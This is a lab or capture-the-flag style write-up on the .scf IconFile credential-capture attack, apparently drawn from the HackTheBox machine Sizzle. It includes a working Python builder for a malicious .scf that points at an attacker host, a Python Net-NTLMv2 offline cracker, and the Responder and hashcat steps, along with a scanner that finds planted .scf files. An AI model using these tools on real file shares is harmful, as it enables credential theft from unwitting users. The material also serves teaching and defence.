A classic attack when you have write access to a file share is to drop a .scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the .scf file is opened with File Explorer, the .scf will cause Explorer to connect back to fetch that icon file, and in doing so offer Net-NTLMv2 authentication. If I control that host, I can capture that exchange and try to crack the Net-NTLMv2 challenge/response with an offline brute force (with a tool like hashcat) to recover the user's password. I used this technique on the Insane machine Sizzle back in 2019.
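To show why capturing that exchange is enough for an offline crack, here is an added example (my code, not from the original post) that recomputes the NTLMv2 proof for each candidate password and compares it with the captured one, exactly what hashcat mode 5600 does at scale. The capture line is constructed from a demo password so the script runs offline; the user, domain, challenge and blob bytes are all made up, and the MD4 is implemented inline because `hashlib.new("md4")` is frequently disabled under OpenSSL 3.

```python
"""Offline Net-NTLMv2 cracking (added example; capture data is constructed)."""
import hashlib
import hmac
import struct


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 of the UTF-16LE password."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         lambda i: i),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         lambda i: (i % 4) * 4 + i // 4),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         lambda i: (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, k, shifts, idx in rounds:
            for i in range(16):
                a = _lrot((a + func(b, c, d) + x[idx(i)] + k) & 0xFFFFFFFF,
                          shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF
        c, d = (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # MS-NLMP NTOWFv2: HMAC_MD5(NT hash, UTF-16LE(Uppercase(user) + domain))
    return hmac.new(nt_hash(password),
                    (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    # NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || temp blob)
    return hmac.new(ntowf_v2(password, user, domain),
                    server_challenge + blob, hashlib.md5).digest()


def hashcat_5600_line(user, domain, server_challenge, proof, blob) -> str:
    # Same layout Responder prints: USER::DOMAIN:challenge:NTProofStr:blob
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist):
    """Brute force a hashcat -m 5600 line; returns the password or None."""
    user, _, rest = line.partition("::")
    domain, chal_hex, proof_hex, blob_hex = rest.split(":")
    chal, proof, blob = (bytes.fromhex(chal_hex), bytes.fromhex(proof_hex),
                         bytes.fromhex(blob_hex))
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed sample (not real capture data): a minimal NTLMv2 'temp' blob
# and a fixed server challenge, with the proof derived from DEMO_PASSWORD.
DEMO_PASSWORD = "Summer2019!"
DEMO_USER, DEMO_DOMAIN = "administrator", "HTB"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = (b"\x01\x01" + b"\x00" * 6                 # RespType, HiRespType, reserved
        + struct.pack("<Q", 0x01D5000000000000)   # timestamp (FILETIME)
        + bytes.fromhex("aabbccddeeff0011")       # client challenge
        + b"\x00" * 4                             # reserved
        + b"\x00" * 4                             # AvPairs: MsvAvEOL only
        + b"\x00" * 4)                            # reserved
CAPTURE = hashcat_5600_line(
    DEMO_USER, DEMO_DOMAIN, SERVER_CHALLENGE,
    nt_proof(DEMO_PASSWORD, DEMO_USER, DEMO_DOMAIN, SERVER_CHALLENGE, BLOB), BLOB)
WORDLIST = ["Password1", "Winter2018!", "Summer2019!", "sizzle"]

if __name__ == "__main__":
    print(CAPTURE)
    print("cracked:", crack(CAPTURE, WORDLIST))
```

The important design point is that nothing in the captured line is secret except the NT hash that keyed the HMACs, so each guess costs two HMAC-MD5s and one MD4, and there is no rate limit: that is why a weak password behind a Net-NTLMv2 capture is as good as gone. Note also that NTLMv2 is not pass-the-hash material; you need the cracked password (or the NT hash, which the capture does not give you) to reuse it.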
SCF files are Windows Shell Command files, and there are far more references on how to make a malicious one than on legitimate uses. Some old Microsoft pages (no longer online, but available on the Wayback Machine) show how to create a Show Desktop shortcut and a View Channels Quick Launch item using SCF files. The format is:
I’ll abuse the IconFile entry by pointing it at my server over SMB, and then run responder, which starts many different kinds of servers (including SMB) to listen for connections and capture Net-NTLMv2 challenge/responses.
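The following is an added example (my code, not from the original post) covering both the SCF layout described above and the IconFile abuse: it builds the documented Show Desktop .scf with the IconFile swapped for a UNC path, and includes a small parser and directory sweep that flags any .scf whose IconFile points at a remote host, which is the check a defender would run over a writable share. The attacker IP 10.10.14.2, the share name and the icon file name are assumptions.

```python
"""Building and spotting a malicious .scf (added example; names are assumed)."""
import os
import tempfile

ATTACKER_HOST = "10.10.14.2"  # assumed IP of the host running Responder


def build_scf(icon_file: str) -> bytes:
    """Return a Show Desktop .scf whose IconFile is `icon_file`.
    Explorer parses the file as INI; CRLF line endings match what Windows writes."""
    lines = ["[Shell]", "Command=2", f"IconFile={icon_file}",
             "[Taskbar]", "Command=ToggleDesktop"]
    return ("\r\n".join(lines) + "\r\n").encode("ascii")


def malicious_scf(host: str = ATTACKER_HOST, share: str = "share",
                  name: str = "icon.ico") -> bytes:
    # A UNC IconFile makes Explorer open the path over SMB and authenticate
    # to `host` as the browsing user, which is what Responder captures.
    return build_scf(f"\\\\{host}\\{share}\\{name}")


def parse_scf(data: bytes) -> dict:
    """Minimal INI parser: returns {section: {key: value}}."""
    result, section = {}, None
    for raw in data.decode("ascii", "replace").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            result[section] = {}
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            result[section][key.strip()] = value.strip()
    return result


def remote_icon_host(data: bytes):
    """Return the host an .scf's IconFile points at, or None if it is local.
    Any UNC IconFile sitting in a writable share deserves a look."""
    icon = parse_scf(data).get("Shell", {}).get("IconFile", "")
    if icon.startswith("\\\\"):
        return icon[2:].split("\\", 1)[0]
    return None


def scan_dir(path: str) -> list:
    """List (filename, host) for every .scf under `path` with a UNC IconFile."""
    hits = []
    for root, _, files in os.walk(path):
        for f in files:
            if f.lower().endswith(".scf"):
                with open(os.path.join(root, f), "rb") as fh:
                    host = remote_icon_host(fh.read())
                if host:
                    hits.append((f, host))
    return hits


def demo_scan() -> list:
    """Write one malicious and one legitimate .scf to a temp dir and sweep it."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "desktop.scf"), "wb") as fh:
            fh.write(malicious_scf())
        with open(os.path.join(d, "Show Desktop.scf"), "wb") as fh:
            fh.write(build_scf("explorer.exe,3"))  # the real Show Desktop icon
        return scan_dir(d)


if __name__ == "__main__":
    print(malicious_scf().decode())
    print(demo_scan())
```

In use, you write the output of `malicious_scf()` into the writable share (for example with `smbclient`'s `put`), start Responder on the attacker host with `responder -I <interface>`, and wait for someone to browse the folder in Explorer; the captured Net-NTLMv2 line goes straight into hashcat mode 5600. From the defensive side, `scan_dir` over a mounted share is a cheap sweep for planted .scf files.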